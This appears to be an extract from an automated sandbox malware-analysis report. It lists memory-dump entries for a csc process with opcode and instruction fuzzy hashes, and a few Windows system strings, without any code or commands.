                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: EXT-
Strings
Memory Dump Source
• Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_5710000_csc.jbxd
Similarity
• API ID:
• String ID: AlternateCodePage
• String ID: BinaryHash
• String ID: TrustedInstaller
• String ID: @
• NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 057DAF2F
• String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
• String ID: WindowsExcludedProcs
• Critical error detected %lx, xrefs: 057F7027
• String ID: Critical error detected %lx
• AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 057C895E
• String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 70dc1ca4417c08c2c698fd623fbfffba4d8613cd639226569e698db63d0480b0
                                                                                  • Instruction ID: 3223897a95676da0cdb1fd707a3af28f3c48709775b01de7ee8eb1b7dbcd7f4b
                                                                                  • Opcode Fuzzy Hash: 70dc1ca4417c08c2c698fd623fbfffba4d8613cd639226569e698db63d0480b0
                                                                                  • Instruction Fuzzy Hash: 6BB18F70B042658BDB25DF65C885BB9B3B6FF44710F1085EAD40AE7281EB30DD85DB20
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bf2eeb3187598854d1fa564bd7c6ec3a18dbeddadae5413e7880b7f23f28f7f6
                                                                                  • Instruction ID: ca11657a437ec7dc91bd5dbd87a6f66d34ee4b8d4f31800529792938394f2f51
                                                                                  • Opcode Fuzzy Hash: bf2eeb3187598854d1fa564bd7c6ec3a18dbeddadae5413e7880b7f23f28f7f6
                                                                                  • Instruction Fuzzy Hash: 79A1F73AE046149FEB21DF58C84CFAEBBBABF41754F050265ED01AB290D7749D40EBA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 47f6f22c5a34cbe4775a6be8b8dc5960b66a728aa2f98200b6494a8373b43a65
                                                                                  • Instruction ID: 4c8a7907c36f9f7174dff93960a142d75a68da34e8d0125d3f22776f249b7a2a
                                                                                  • Opcode Fuzzy Hash: 47f6f22c5a34cbe4775a6be8b8dc5960b66a728aa2f98200b6494a8373b43a65
                                                                                  • Instruction Fuzzy Hash: 2AA1C070B40615DFEB24EF65C898BBAB7B6FF45314F104029EA1997381EB74E805EB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 11a5517104c8214bd6da2f0732097816c7d704c78b8a587554af381d28630ad3
                                                                                  • Instruction ID: 0940ecff6b104932639041344f41561dc50c2a795b6a90090479ce893a5bb6a7
                                                                                  • Opcode Fuzzy Hash: 11a5517104c8214bd6da2f0732097816c7d704c78b8a587554af381d28630ad3
                                                                                  • Instruction Fuzzy Hash: A4A1CC72A14201AFCB11DF18C985F6AB7EAFF48758F150928ED49DB260D774EC01CB95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 73e95d0c893434adf5e9a3446084ba42527305071ec97c5ee3de11cd614785c7
                                                                                  • Instruction ID: 39e214396bc744c6a54cccb8db02d2bf12ca33647cb97d74684c9aae15070ac0
                                                                                  • Opcode Fuzzy Hash: 73e95d0c893434adf5e9a3446084ba42527305071ec97c5ee3de11cd614785c7
                                                                                  • Instruction Fuzzy Hash: 13917071E04215AFDF15CFACD8D8BAEBFB5AF48710F1541ADE911AB241D734E900ABA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 36186773ffb902fb38d8c24ce2ccc3df5099b190922180fd3e5f470b70556892
                                                                                  • Instruction ID: 270ca202d0779f8dd3ca23782054937657b205dce526f5c052776ff9512ab621
                                                                                  • Opcode Fuzzy Hash: 36186773ffb902fb38d8c24ce2ccc3df5099b190922180fd3e5f470b70556892
                                                                                  • Instruction Fuzzy Hash: A8913532B006159BDB25DB29C888B7E77A6FF84720F0541A5ED06DB340EBB4DE01E7A0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ed4d350f8f94d0eac7db90ad0b427da0ee9d915ac4cb9299cb91f256f99e8fad
                                                                                  • Instruction ID: 8857f57233b97ab60c0c20d128706d97c082e1136d647fe335f9b6147be75f9f
                                                                                  • Opcode Fuzzy Hash: ed4d350f8f94d0eac7db90ad0b427da0ee9d915ac4cb9299cb91f256f99e8fad
                                                                                  • Instruction Fuzzy Hash: 84718475608312ABEF28CF25E984B7AB7E5BB85350F04492DFA55D7200E730E844DBE2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: becd5fc8d276952eb91661ad7a923c7549b341fd072ad9918b569ba0e24e97f0
                                                                                  • Instruction ID: 09a050f008599f3b12ca6a608dd9fb4d7b765d04bfcbe19e46c3dfceaa1a1600
                                                                                  • Opcode Fuzzy Hash: becd5fc8d276952eb91661ad7a923c7549b341fd072ad9918b569ba0e24e97f0
                                                                                  • Instruction Fuzzy Hash: 03819E71A00609AFDB25CFA4D884FEEB7FAFF48304F104429E956A7210DB70AC45EB60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8d39c61b3b3122016275e9bccf1004da677e85ad53bbadd0bbf3519f94243cde
                                                                                  • Instruction ID: bc18c20e7e6d217605feec6549728957eab10c8ed2ee0f07e39039c9e373fb66
                                                                                  • Opcode Fuzzy Hash: 8d39c61b3b3122016275e9bccf1004da677e85ad53bbadd0bbf3519f94243cde
                                                                                  • Instruction Fuzzy Hash: 8E71BE75908265DFCB26CF59D450BBEBBB5FF88710F14465AEC42AB350E7749800DB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 05e7620814a2bff9e780a9063fb0d35195a71d42b507d840365bf71f006dd35e
                                                                                  • Instruction ID: b213d5ed36d7a8d3cde9d060ce6a1eb41fb936972ad7c4680966fc911141d117
                                                                                  • Opcode Fuzzy Hash: 05e7620814a2bff9e780a9063fb0d35195a71d42b507d840365bf71f006dd35e
                                                                                  • Instruction Fuzzy Hash: 2671C270A041669FCB14DF59C844ABEFBF6FF45300F048499E894DB241E335DA45DBA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9fa4a4428d01eda04154095409e5b535efa084039dfa211571cb769e0bc8245c
                                                                                  • Instruction ID: 5b6983d4d2cd253f13ebb42f3e75df93eb1edb75ff41a4e08e0f105871e0046b
                                                                                  • Opcode Fuzzy Hash: 9fa4a4428d01eda04154095409e5b535efa084039dfa211571cb769e0bc8245c
                                                                                  • Instruction Fuzzy Hash: 4671C476B046418FC311DF28C488B6AB7E6FF84320F0585A9EC55CB752DB74D845DB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                  • Instruction ID: f7aff9110b7f8c1d7a1a2d54f2c5aaf213ee63d1fa01dee9a8eb762486ed58ef
                                                                                  • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                  • Instruction Fuzzy Hash: 75716071A00619EFCB10DFA5C948EEEBBB9FF48710F10456DE905A7250DB34EA41DB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c6f51174f32f8c8cfa6920905f429b1e57cffbcf3e3d081c5229768b4336a2c5
                                                                                  • Instruction ID: 09034b7912d0efd762e6c414929cce2235f67a7b590ba7fa3b90bb526810cc8f
                                                                                  • Opcode Fuzzy Hash: c6f51174f32f8c8cfa6920905f429b1e57cffbcf3e3d081c5229768b4336a2c5
                                                                                  • Instruction Fuzzy Hash: 1271D032240701AFD722DF14C848F6AFBF6FF44760F154928E6568B2A0DB75E944EB60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b282d88b5712317ae671cc0879d18ce3f8543fc67ed2f242ba0a7165aa74028d
                                                                                  • Instruction ID: 1fe899f043ce3901ad62b54a252ba31977ba21a10491f30b754f65d4f2b87d6a
                                                                                  • Opcode Fuzzy Hash: b282d88b5712317ae671cc0879d18ce3f8543fc67ed2f242ba0a7165aa74028d
                                                                                  • Instruction Fuzzy Hash: 97619FB1A00209DFDF19DF68D885BBEB7BABF08310F104569E912EB290DBB09D01DB51
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c039dac4d0c79e4adae2489b980ce8c838fb626483c5f982736a6a658be53934
                                                                                  • Instruction ID: e6ca4ae61b31964c6593ddac661c6114a87b222dc8bbb2d72110bd7c9ebee528
                                                                                  • Opcode Fuzzy Hash: c039dac4d0c79e4adae2489b980ce8c838fb626483c5f982736a6a658be53934
                                                                                  • Instruction Fuzzy Hash: 8F719EB2605B428FDB368F24D609B32B7E6BF407B1F540A1DD9D2069E2D730A841EB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 10fe8b1f859f2f7ca280423b2a21e3ea03f7d70be765de4f530fe9d0de221e83
                                                                                  • Instruction ID: 9a6368d87c565b9bf14a95628178f2cc8c0d0fecf4978fc4fcd3ad7ca8d5e85d
                                                                                  • Opcode Fuzzy Hash: 10fe8b1f859f2f7ca280423b2a21e3ea03f7d70be765de4f530fe9d0de221e83
                                                                                  • Instruction Fuzzy Hash: E0519175704741DFEB20DF59C488B6BB7AAFF44319F50492DE80287651D7B4E844EBA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
                                                                                  • Instruction ID: 55252baeffb8030c545a00481077acfd7685a985132a4c74ef7bc8beb6f5a540
                                                                                  • Opcode Fuzzy Hash: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
                                                                                  • Instruction Fuzzy Hash: 93518176E0460ADFDB14CF98C5846EDB7BAFB88310F158269DC56BB200D734AA41DB54
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4fa8fcde1d773a84cb0760841796d7e298072052ef56395aceac0da390827028
                                                                                  • Instruction ID: 1d52cc35e832960f09e3c2dca66f4fbbaea1ba3c95d23291dd8a8d24643cdad2
                                                                                  • Opcode Fuzzy Hash: 4fa8fcde1d773a84cb0760841796d7e298072052ef56395aceac0da390827028
                                                                                  • Instruction Fuzzy Hash: 8241A272204745DFC722CF28C489F9677E6BF89754F114929E95A8B290D770F804EF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f7347ad76c9c86dc65c89daed89238317501206b72f65cd682cfb8c4669e39ed
                                                                                  • Instruction ID: 966fc7483ba480e3653b3f7651a93693128aa681c35ef739562a094e770d8d7a
                                                                                  • Opcode Fuzzy Hash: f7347ad76c9c86dc65c89daed89238317501206b72f65cd682cfb8c4669e39ed
                                                                                  • Instruction Fuzzy Hash: 7731D772209345AFD716EF24C849E6BB7E8EF44760F04497DF8519B250E6B0EC05DBA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b2d9dac633b85ecf4bb8fb208f2859ae8e2c44c41d1a83d541c75c65c977c954
                                                                                  • Instruction ID: 39c5415b388fff57e9ce877855fcd72ad74cc2613d6d2a410c9cbc14809297f2
                                                                                  • Opcode Fuzzy Hash: b2d9dac633b85ecf4bb8fb208f2859ae8e2c44c41d1a83d541c75c65c977c954
                                                                                  • Instruction Fuzzy Hash: 1F31D275A0021AABDB15DF99CC44FAEB7B6FB44B44F454168E800EB284E7B0ED10CBA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7074257a9b62911b2e9ecc116983a0b48b7972c69d2f55d75fdc97bb18e4ea2c
                                                                                  • Instruction ID: d388cc8fe3119f4e7ad7772a82a8c0fb1324b547b3206d090d57538bc14cc4e6
                                                                                  • Opcode Fuzzy Hash: 7074257a9b62911b2e9ecc116983a0b48b7972c69d2f55d75fdc97bb18e4ea2c
                                                                                  • Instruction Fuzzy Hash: 0C31B672A04611DFC712DE24894CE7BBBAAAFC4660F014529FE559B310DB30DC11BBE1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2154bd8e4164bb428e8c8caed82f508e277aed02393895e222203a2227c73148
                                                                                  • Instruction ID: fc3a1b92ce21a359d0e49f4b8e7758ab1f6a28b11ecab32feb679c26899b5d0a
                                                                                  • Opcode Fuzzy Hash: 2154bd8e4164bb428e8c8caed82f508e277aed02393895e222203a2227c73148
                                                                                  • Instruction Fuzzy Hash: 1E31C071B40605ABDF12AFAACC54F6EB7BAAF44754F000469ED05EB391EA70EC109B90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1638c9d8e362191d6aa7eb69d05eaaba2c6fcab45deb006fca3338c292b163d0
                                                                                  • Instruction ID: 7bd496769154ccf01a5d8e88c4b13bdab991752e8b10c90c5489c181aedebede
                                                                                  • Opcode Fuzzy Hash: 1638c9d8e362191d6aa7eb69d05eaaba2c6fcab45deb006fca3338c292b163d0
                                                                                  • Instruction Fuzzy Hash: 7B318D766093418FD320CF1AC844B2BF7E5FB88710F054A6EE9869B351D770E844DB92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 773563326dbd777675b59883e8b48c756d3cfee233db775fd4c01a578b60b9f3
                                                                                  • Instruction ID: f5a56c70c631834df6539eaed5dcc4de74f4849c8a0000ce7881699e901af759
                                                                                  • Opcode Fuzzy Hash: 773563326dbd777675b59883e8b48c756d3cfee233db775fd4c01a578b60b9f3
                                                                                  • Instruction Fuzzy Hash: 99317075A011299BDB21DF29CC48FAFBBB9FF45344F0500A6ED09E7250DA309E45DB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                  • Instruction ID: 202d9a73c87baf9456de43bffbf4c85fb0ff1123d49feada20fb327c553e71a4
                                                                                  • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                  • Instruction Fuzzy Hash: 4C314D72B04B04AFEB64CF69DD44B6BB7F9BF08B50F04096DA59AC3650E670E900DB60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 154ac63e9e45016b6a1e4d8620933c2983eee547a2a2d555ac144fe2bfd4344f
                                                                                  • Instruction ID: c3d199ae9a2db1b142b9b9426c66f7714753642e76f1fb41f667c53de69ee71e
                                                                                  • Opcode Fuzzy Hash: 154ac63e9e45016b6a1e4d8620933c2983eee547a2a2d555ac144fe2bfd4344f
                                                                                  • Instruction Fuzzy Hash: E231D632B142059FCB14EFA9C9C6A6E7BFABB84304F108529D846D7654E730E941EB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a053d139333ab929dcaa045e83c965e87c4f57c87a4235a2db77ea760f83a758
                                                                                  • Instruction ID: 415ffb2f21f393a58b61d6bebe2676c11daf003752e97fe99cb18cd3848b51b6
                                                                                  • Opcode Fuzzy Hash: a053d139333ab929dcaa045e83c965e87c4f57c87a4235a2db77ea760f83a758
                                                                                  • Instruction Fuzzy Hash: 9131D432A4152C9BDB31DF14CC46FEE77BEEB05760F0104A1FA55A7291D6B4AE80AF90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cee32862aeba41c672c83766e7dd96418fd4d674695db0434c8c8304ff7bdf81
                                                                                  • Instruction ID: 7aa941031af3ee41978ad7f15e71598d0dc9eee5fe74894866a0ef0d68b6751f
                                                                                  • Opcode Fuzzy Hash: cee32862aeba41c672c83766e7dd96418fd4d674695db0434c8c8304ff7bdf81
                                                                                  • Instruction Fuzzy Hash: E73149B56002009BCB35AF28DC49B797775FF40354F5481A9DD469B342EB749D82EBA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                  • Instruction ID: ce866ab562ae348d0f8d9b566951a1aa789376d94f00a26b7e08214e1b5da901
                                                                                  • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                  • Instruction Fuzzy Hash: 5F214D3670465966CF16EBD98808EBABBB9EF40710F40841AFAA58B791E634DD50E360
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 95bdb3618aa2f6f5cb96c6cbbe0cf4326d09fed4b269a246320688e4859281cb
                                                                                  • Instruction ID: e7fe23c7d9b2ceaeaf8617d6c4d588a97e4dbec7f9fb4a60776d308401e14fc0
                                                                                  • Opcode Fuzzy Hash: 95bdb3618aa2f6f5cb96c6cbbe0cf4326d09fed4b269a246320688e4859281cb
                                                                                  • Instruction Fuzzy Hash: 6A31CF316042059BEB24DFA9C844FAAB7F5BB80314F14435AE5169B1D1DB70D981D791
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                  • Instruction ID: eec490348b32d58457705bc793f9158bcc9403f13d095344f9fdee5f597a532d
                                                                                  • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                  • Instruction Fuzzy Hash: 31219F36B00608EBCF11CF98D984A9EBBB6FF48310F108069ED15DF241D670EA05EB94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9e49d5f08d8f8c3703197d3e00b9185216b3f2d38153eccd32c96165f3e614b4
                                                                                  • Instruction ID: ed5274caf631579807daeeaef0108a77134cf5bf19405eff1f5406caebe8de5e
                                                                                  • Opcode Fuzzy Hash: 9e49d5f08d8f8c3703197d3e00b9185216b3f2d38153eccd32c96165f3e614b4
                                                                                  • Instruction Fuzzy Hash: F521D5726087499BCF22DF19D884B6BB7E6FF88760F044919FC559B240D770EA00DBA2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7fb12c08c9563bf04341584c1389535f17fbd57da432c9de8945db1bc911bd80
